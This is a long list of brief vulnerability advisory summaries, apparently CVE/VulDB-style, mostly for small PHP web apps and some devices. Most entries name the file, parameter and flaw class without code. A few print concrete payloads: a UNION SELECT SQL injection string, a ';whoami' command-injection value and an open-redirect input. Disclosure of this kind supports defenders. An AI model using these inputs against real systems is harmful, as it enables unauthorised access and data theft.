A vulnerability has been found in SourceCodester E-Commerce System 1.0 and classified as critical. This vulnerability affects unknown code of the file /ecommerce/admin/login.php of the component Admin Login. The manipulation of the argument user_email leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, was found in SourceCodester Online Computer and Laptop Store 1.0. This affects an unknown part of the file /php-ocls/classes/SystemSettings.php?f=update_settings of the component Setting Handler. The manipulation of the argument System Name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, has been found in SourceCodester Online Computer and Laptop Store 1.0. Affected by this issue is some unknown functionality of the file /php-ocls/classes/Master.php?f=pay_order. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical was found in itsourcecode Payroll Management System 1.0. Affected by this vulnerability is an unknown functionality of the file login.php. The manipulation of the argument username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in SourceCodester Online Health Care System 1.0. Affected is an unknown function of the file search.php. The manipulation of the argument f_name with the input 1%' or 1=1 ) UNION SELECT 1,2,3,4,5,database(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23# as part of string leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in chillzhuang SpringBlade 4.1.0. Affected is an unknown function of the file /api/blade-system/menu/list?updatexml. The manipulation leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Genexis Tilgin Home Gateway 322_AS0500-03_05_13_05. It has been rated as problematic. This issue affects some unknown processing of the file /vood/cgi-bin/vood_view.cgi?lang=EN&amp;act=user/spec_conf&amp;sessionId=86213915328111654515&amp;user=A&amp;message2user=Account%20updated. The manipulation of the argument Phone Number leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, was found in SourceCodester Online Graduate Tracer System up to 1.0. Affected is an unknown function of the file /tracking/admin/fetch_genderit.php. The manipulation of the argument request leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as problematic was found in SourceCodester Accounts Manager App 1.0. This vulnerability affects unknown code of the file update-account.php of the component Update Account Page. The manipulation of the argument Account Name/Username/Password/Link leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in SourceCodester Point of Sales and Inventory Management System 1.0. This affects an unknown part of the file login.php. The manipulation of the argument email leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in itsourcecode Online Blood Bank Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file register.php of the component User Signup. The manipulation of the argument user leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in itsourcecode Laravel Property Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/notes/create of the component Notes Page. The manipulation of the argument Note text leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in SourceCodester Leads Manager Tool 1.0 and classified as problematic. This vulnerability affects unknown code of the file update-leads.php. The manipulation of the argument phone_number leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical was found in itsourcecode Project Expense Monitoring System 1.0. This vulnerability affects unknown code of the file printtransfer.php. The manipulation of the argument transfer_id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in itsourcecode Project Expense Monitoring System 1.0. This affects an unknown part of the file transferred_report.php. The manipulation of the argument start/end/employee leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in itsourcecode Project Expense Monitoring System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file print.php. The manipulation of the argument map_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in itsourcecode Project Expense Monitoring System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file execute.php. The manipulation of the argument code leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in itsourcecode Project Expense Monitoring System 1.0. It has been classified as critical. Affected is an unknown function of the file login1.php of the component Backend Login. The manipulation of the argument user leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Online Graduate Tracer System 1.0 and classified as critical. This issue affects some unknown processing of the file /tracking/admin/view_csprofile.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in SourceCodester Clinics Patient Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /pms/ajax/get_packings.php. The manipulation of the argument medicine_id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, was found in SourceCodester Simple Forum Website 1.0. This affects an unknown part of the file /registration.php of the component Signup Page. The manipulation of the argument username leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, has been found in FastAdmin up to 1.3.3.20220121. Affected by this issue is some unknown functionality of the file /index/ajax/lang. The manipulation of the argument lang leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.3.4.20220530 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability classified as critical was found in ZZCMS 2023. Affected by this vulnerability is an unknown functionality of the file /admin/class.php?dowhat=modifyclass. The manipulation of the argument skin[] leads to path traversal. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in ZZCMS 2023. Affected is an unknown function of the file /admin/about_edit.php?action=modify. The manipulation of the argument skin leads to path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in ZZCMS 2023. It has been rated as problematic. This issue affects some unknown processing of the file 3/E_bak5.1/upload/eginfo.php. The manipulation of the argument phome with the input ShowPHPInfo leads to information disclosure. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in ZZCMS 2023. It has been declared as critical. This vulnerability affects unknown code of the file /I/list.php. The manipulation of the argument skin leads to path traversal. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in Anhui Deshun Intelligent Technology Jieshun JieLink+ JSOTC2016 up to 20240805 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /report/ParkOutRecord/GetDataList. The manipulation leads to improper access controls. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, was found in Anhui Deshun Intelligent Technology Jieshun JieLink+ JSOTC2016 up to 20240805. Affected is an unknown function of the file /Report/ParkCommon/GetParkInThroughDeivces. The manipulation leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, has been found in Anhui Deshun Intelligent Technology Jieshun JieLink+ JSOTC2016 up to 20240805. This issue affects some unknown processing of the file /report/ParkChargeRecord/GetDataList. The manipulation leads to improper access controls. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, has been found in DouPHP 1.7 Release 20220822. Affected by this issue is some unknown functionality of the file /admin/system.php of the component Favicon Handler. The manipulation of the argument site_favicon leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as problematic was found in nafisulbari/itsourcecode Insurance Management System 1.0. Affected by this vulnerability is an unknown functionality of the file addNominee.php of the component Add Nominee Page. The manipulation of the argument Nominee-Client ID leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in SourceCodester Yoga Class Registration System 1.0. Affected is an unknown function of the file /php-ycrs/classes/SystemSettings.php. The manipulation of the argument address leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in itsourcecode Billing System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /addclient1.php. The manipulation of the argument lname/fname/mi/address/contact/meterReader leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in CodeAstro Online Railway Reservation System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /admin/assets/. The manipulation leads to exposure of information through directory listing. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Simple Online Bidding System 1.0. It has been classified as critical. This affects an unknown part of the file /simple-online-bidding-system/bidding/index.php. The manipulation of the argument page leads to file inclusion. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in CodeAstro Online Railway Reservation System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/emp-profile-avatar.php of the component Profile Photo Update Handler. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in DedeBIZ 6.3.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file admin/file_manage_control.php of the component File Extension Handler. The manipulation of the argument upfile1 leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in DedeBIZ 6.3.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file admin/media_add.php of the component File Extension Handler. The manipulation of the argument upfile1 leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in pkp ojs up to 3.4.0-6 and classified as problematic. Affected by this issue is some unknown functionality of the file /login/signOut. The manipulation of the argument source with the input .example.com leads to open redirect. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in Scada-LTS 2.7.8 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /Scada-LTS/app.shtm#/alarms/Scada of the component Message Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. NOTE: A fix is planned for the upcoming release at the end of September 2024.
A vulnerability, which was classified as problematic, was found in xiaohe4966 TpMeCMS 1.3.3.2. Affected is an unknown function of the file /h.php/general/config?ref=addtabs of the component Basic Configuration Handler. The manipulation of the argument Site Name/Beian/Contact address/copyright/technical support leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, has been found in InnoCMS 0.3.1. This issue affects some unknown processing of the file /panel/pages/1/edit of the component Backend. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical was found in Tosei Online Store Management System &amp;#12493;&amp;#12483;&amp;#12488;&amp;#24215;&amp;#33303;&amp;#31649;&amp;#29702;&amp;#12471;&amp;#12473;&amp;#12486;&amp;#12512; 4.02/4.03/4.04. This vulnerability affects unknown code of the component Backend. The manipulation leads to use of default credentials. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in Tosei Online Store Management System &amp;#12493;&amp;#12483;&amp;#12488;&amp;#24215;&amp;#33303;&amp;#31649;&amp;#29702;&amp;#12471;&amp;#12473;&amp;#12486;&amp;#12512; 4.02/4.03/4.04. This affects an unknown part of the file /cgi-bin/tosei_kikai.php. The manipulation of the argument kikaibangou leads to command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Tosei Online Store Management System &amp;#12493;&amp;#12483;&amp;#12488;&amp;#24215;&amp;#33303;&amp;#31649;&amp;#29702;&amp;#12471;&amp;#12473;&amp;#12486;&amp;#12512; 4.02/4.03/4.04. It has been rated as critical. Affected by this issue is some unknown functionality of the file /cgi-bin/p1_ftpserver.php. The manipulation of the argument adr_txt leads to command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in LimeSurvey 6.3.0-231016 and classified as problematic. Affected by this issue is some unknown functionality of the file /index.php of the component File Upload. The manipulation of the argument size leads to denial of service. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in Scooter Software Beyond Compare up to 3.3.5.15075 and classified as critical. Affected by this vulnerability is an unknown functionality in the library 7zxa.dll. The manipulation leads to uncontrolled search path. Attacking locally is a requirement. The real existence of this vulnerability is still doubted at the moment. NOTE: The vendor explains that a system must be breached before exploiting this issue.
A vulnerability was found in SourceCodester Yoga Class Registration System up to 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/?page=categories/view_category. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Yoga Class Registration System 1.0 and classified as problematic. This issue affects some unknown processing of the file /admin/inquiries/view_inquiry.php. The manipulation of the argument message leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in SourceCodester Yoga Class Registration System 1.0 and classified as critical. This vulnerability affects unknown code of the file /classes/Users.php?f=save of the component Add User Handler. The manipulation leads to improper authorization. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Online Graduate Tracer System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /tracking/admin/fetch_it.php. The manipulation of the argument request leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in SourceCodester Online Graduate Tracer System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /tracking/admin/add_acc.php. The manipulation of the argument name/user/position leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, was found in SourceCodester Online Graduate Tracer System 1.0. Affected is an unknown function of the file /tracking/admin/exportcs.php. The manipulation leads to information disclosure. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, has been found in SourceCodester Online Graduate Tracer System 1.0. This issue affects some unknown processing of the file /tracking/admin/export_it.php. The manipulation leads to information disclosure. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical was found in SourceCodester Clinics Patient Management System 1.0. This vulnerability affects unknown code of the file /pms/ajax/check_user_name.php. The manipulation of the argument user_name leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in itsourcecode Billing System 1.0. This affects an unknown part of the file addbill.php. The manipulation of the argument owners_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in itsourcecode Online Food Ordering System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /addcategory.php. The manipulation of the argument cname leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in CodeAstro Online Railway Reservation System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/admin-update-employee.php of the component Update Employee Page. The manipulation of the argument emp_fname /emp_lname /emp_nat_idno/emp_addr leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, was found in CodeAstro Online Railway Reservation System 1.0. Affected is an unknown function of the file /admin/admin-add-employee.php of the component Add Employee Page. The manipulation of the argument emp_fname /emp_lname /emp_nat_idno/emp_addr leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, has been found in SourceCodester Prison Management System 1.0. This issue affects some unknown processing of the file /uploadImage/Profile/ of the component Profile Image Handler. The manipulation leads to insufficiently protected credentials. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as problematic was found in SourceCodester Best House Rental Management System 1.0. This vulnerability affects unknown code of the file /rental_0/rental/ajax.php?action=save_tenant of the component POST Parameter Handler. The manipulation of the argument lastname leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in SourceCodester Daily Expenses Monitoring App 1.0. This affects an unknown part of the file /endpoint/delete-expense.php. The manipulation of the argument expense leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Online Graduate Tracer System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /tracking/admin/view_itprofile.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Online Graduate Tracer System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /tracking/nbproject/. The manipulation leads to exposure of information through directory listing. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in code-projects Job Portal 1.0. It has been classified as critical. Affected is an unknown function of the file logindbc.php. The manipulation of the argument email leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in SourceCodester Simple Online Bidding System 1.0. This affects an unknown part of the file /simple-online-bidding-system/bidding/admin/ajax.php?action=delete_product. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Simple Online Bidding System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /simple-online-bidding-system/bidding/admin/users.php. The manipulation leads to improper authorization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Simple Online Bidding System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /simple-online-bidding-system/bidding/admin/ajax.php?action=login2. The manipulation of the argument username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Simple Online Bidding System 1.0. It has been classified as critical. Affected is an unknown function of the file /simple-online-bidding-system/bidding/admin/ajax.php?action=login. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in itsourcecode Vehicle Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file mybill.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Task Progress Tracker 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /endpoint/add-task.php. The manipulation of the argument task_name leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Task Progress Tracker 1.0. It has been classified as critical. Affected is an unknown function of the file /endpoint/delete-task.php. The manipulation of the argument task leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Clinics Patient Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /ajax/check_medicine_name.php. The manipulation of the argument user_name leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Clinics Patient Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /user_images/. The manipulation leads to direct request. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Clinics Patient Management System 1.0. It has been classified as problematic. This affects an unknown part of the file /update_medicine.php. The manipulation of the argument medicine_name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Clinics Patient Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /update_medicine.php. The manipulation of the argument hidden_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in SourceCodester Clinics Patient Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /medicines.php. The manipulation of the argument medicine_name leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, was found in SourceCodester Accounts Manager App 1.0. Affected is an unknown function of the file /endpoint/add-account.php. The manipulation of the argument account_name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, has been found in SourceCodester Accounts Manager App 1.0. This issue affects some unknown processing of the file /endpoint/delete-account.php. The manipulation of the argument account leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, was found in yzane vscode-markdown-pdf 1.5.0. This affects an unknown part. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, has been found in yzane vscode-markdown-pdf 1.5.0. Affected by this issue is some unknown functionality of the component Markdown File Handler. The manipulation leads to pathname traversal. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, was found in FastCMS up to 0.1.5. Affected is an unknown function of the component New Article Category Page. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, has been found in OcoMon 4.0RC1/4.0/5.0RC1. This issue affects some unknown processing of the file /includes/common/require_access_recovery.php of the component URL Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.0.1 and 5.0 is able to address this issue. It is recommended to upgrade the affected component.
A vulnerability was found in Weaver e-cology 8. It has been classified as problematic. Affected is an unknown function of the file /cloudstore/ecode/setup/ecology_dev.zip of the component Source Code Handler. The manipulation leads to information disclosure. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, was found in SourceCodester Kortex Lite Advocate Office Management System 1.0. This affects an unknown part of the file register_case.php. The manipulation of the argument title/description/opposite_lawyer leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, has been found in SourceCodester Kortex Lite Advocate Office Management System 1.0. Affected by this issue is some unknown functionality of the file adds.php. The manipulation of the argument name/dob/email/mobile/address leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as problematic was found in SourceCodester Kortex Lite Advocate Office Management System 1.0. Affected by this vulnerability is an unknown functionality of the file add_act.php. The manipulation of the argument aname leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as problematic has been found in SourceCodester Kortex Lite Advocate Office Management System 1.0. Affected is an unknown function of the file addcase_stage.php. The manipulation of the argument cname leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in code-projects Job Portal 1.0. It has been rated as critical. This issue affects some unknown processing of the file rw_i_nat.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in code-projects College Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file login.php of the component Login Page. The manipulation of the argument email/password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in itsourcecode Tailoring Management System 1.0. It has been classified as critical. This affects an unknown part of the file /incedit.php?id=4. The manipulation of the argument id/inccat/desc/date/amount leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Car Driving School Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /classes/Master.php?f=save_package. The manipulation of the argument name/description/training_duration leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, has been found in SourceCodester Car Driving School Management System 1.0. Affected by this issue is some unknown functionality of the file view_package.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical was found in SourceCodester Car Driving School Management System 1.0. Affected by this vulnerability is an unknown functionality of the file manage_package.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in SourceCodester Car Driving School Management System 1.0. Affected is an unknown function of the file view_details.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Car Driving School Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file manage_user.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in SourceCodester File Manager App 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Add File Handler. The manipulation of the argument File Title/Uploaded By leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as problematic was found in Gila CMS 1.10.9. This vulnerability affects unknown code of the file /cm/update_rows/page?id=2 of the component HTTP POST Request Handler. The manipulation of the argument content leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in SourceCodester Clinics Patient Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file users.php of the component User Page. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Leads Manager Tool 1.0. It has been classified as problematic. This affects an unknown part of the file /endpoint/add-leads.php of the component Add Leads Handler. The manipulation of the argument leads_name/phone_number leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Leads Manager Tool 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /endpoint/delete-leads.php of the component Delete Leads Handler. The manipulation of the argument leads leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in SourceCodester Kortex Lite Advocate Office Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file activate_act.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, was found in SourceCodester Kortex Lite Advocate Office Management System 1.0. Affected is an unknown function of the file deactivate_act.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, has been found in SourceCodester Kortex Lite Advocate Office Management System 1.0. This issue affects some unknown processing of the file delete_register.php. The manipulation of the argument case_register_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical was found in SourceCodester Kortex Lite Advocate Office Management System 1.0. This vulnerability affects unknown code of the file delete_act.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in SourceCodester Kortex Lite Advocate Office Management System 1.0. This affects an unknown part of the file delete_client.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in code-projects Online Polling 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file registeracc.php of the component Registration. The manipulation of the argument email leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in code-projects Simple Ticket Booking 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file authenticate.php of the component Login. The manipulation of the argument email/password leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in code-projects Simple Ticket Booking 1.0. It has been classified as critical. Affected is an unknown function of the file register_insert.php of the component Registration Handler. The manipulation of the argument name/email/dob/password/Gender/phone leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Alien Technology ALR-F800 up to 19.10.24.00. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/system.html. The manipulation of the argument uploadedFile with the input ;whoami leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Alien Technology ALR-F800 up to 19.10.24.00. It has been classified as critical. Affected is an unknown function of the file /var/www/cmd.php. The manipulation of the argument cmd leads to improper authorization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in juzaweb CMS up to 3.4.2. It has been classified as problematic. Affected is an unknown function of the file /admin-cp/theme/editor/default of the component Theme Editor. The manipulation leads to path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273696. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in itsourcecode Tailoring Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /setlogo.php. The manipulation of the argument bgimg leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273649 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in itsourcecode Bike Delivery System 1.0. Affected is an unknown function of the file contact_us_action.php. The manipulation of the argument name leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273648.
A vulnerability was found in itsourcecode Airline Reservation System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file flights.php. The manipulation of the argument departure_airport_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273625 was assigned to this vulnerability.
